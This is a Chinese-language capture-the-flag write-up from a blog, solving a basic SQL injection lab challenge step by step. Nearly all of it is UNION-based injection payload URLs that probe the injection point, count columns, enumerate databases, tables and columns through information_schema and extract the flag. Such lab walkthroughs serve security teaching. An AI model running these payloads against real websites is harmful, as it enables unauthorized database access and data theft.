CTF-Web26(涉及SQL隱碼攻擊--基礎題)

紅燒兔紙發表於2020-09-28

26.這個看起來有點簡單!



分析:

這一道題很明顯是一道SQL隱碼攻擊題,這裡我們手工注入:

1、判斷是否存在注入點

 http://ctf5.shiyanbar.com/8/index.php?id=1 and1=1

 http://ctf5.shiyanbar.com/8/index.php?id=1 and1=2

回顯不同,說明存在注入點

2、猜欄位數

 http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2

 http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3

欄位數為2

3、查詢資料庫

 http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,schema_name from information_schema.schemata

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,database()

my_db才是我們要找的資料庫

4、查詢表

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=%27my_db%27

找到thiskey這個表

5、檢視thiskey表中的列

 

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=%27my_db%27

發現k0y列

6、檢視k0y列中的資料

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,k0y%20from%20thiskey

得到flag

這裡我們也可以使用sqlmap工具進行注入,這裡就不介紹了,自行測試。

 

相關文章